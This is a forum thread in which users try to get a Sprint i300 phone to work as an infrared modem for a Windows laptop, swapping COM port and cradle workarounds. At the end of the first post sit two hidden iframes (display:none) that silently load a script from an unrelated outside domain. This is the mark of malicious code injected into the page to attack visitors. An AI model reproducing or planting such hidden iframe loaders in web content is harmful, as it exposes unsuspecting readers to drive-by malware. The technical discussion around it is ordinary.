+ Reply to Thread

Thread: IR modem?

Lightbulb IR modem?

I have a Nokia 8290 phone and used it on numerous occasions as a wireless modem via the IR port. This worked equally well with Palm devices, Windows based handhelds, and laptops.

Rather than buying the "Internet Kit" when it becomes available,
    doesn't it seem natural that one could use the IR port on the i300 to connect to the internet using the IR port of a laptop for example?

Well I could not get it to work. When I place the i300 next to my
    Win 2000 based laptop, I get a message the "Daniel Tone" (in my case) is near but that's all.

Does anyone know of a way to do this?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I was trying to do the same thing, let me know if you find out anything...

in the meantime, you can use the cradle to make the connection:'

http://www.sphi300.com/showthread.php?s=&threadid=12

Brooks

Well at least I know there's another way other than the $60 web kit. This brings to mind the travel kit (travel charger and a hotsync cable) from Palm - perhaps they will make one for the i300.

I tried different approaches, including the Sprint dialer app. Nothing worked so far. I'm attempting to redirect the IR port directly to Com 1 on the laptop and try that approach.

I have my PPP connection trying to use the IR port on my laptop..... when I have the I300 and the laptop aimed at eachother... the phone responds to the laptop saying "Beam: waiting for sender".... but nothing happens.... the phone won't dial up the connection...

BTW, I love how sprint charges my credit card for accessories they DON'T have in stock.... even when they have no idea when they will get them in stock...

Brooks

I get exactly the same thing. Here's my idea though:
    I would like to add a standard modem (19.2) and assign it COM1 for example.
    I found out that in my case the IR port uses IRQ11 and COM1 uses IRQ3
    I want to fool COM1 into thinking it's the IR port. This is the tricky part. Can I assign a COM port to the IR port? I know there was a way to do this in NT but I don't have an NT laptop anymore.

Assuming the above is possible, the other consideration is that I would go into the Hotsync app on the i300 and change "direct serial" to "IR" if it doesn't work the first time around.

That's my approach but again I don't know how to make the IR port think its COM2 for example.

FYI - I tried connecting to the net with the cradle. It totally worked with my NT desktop computer also.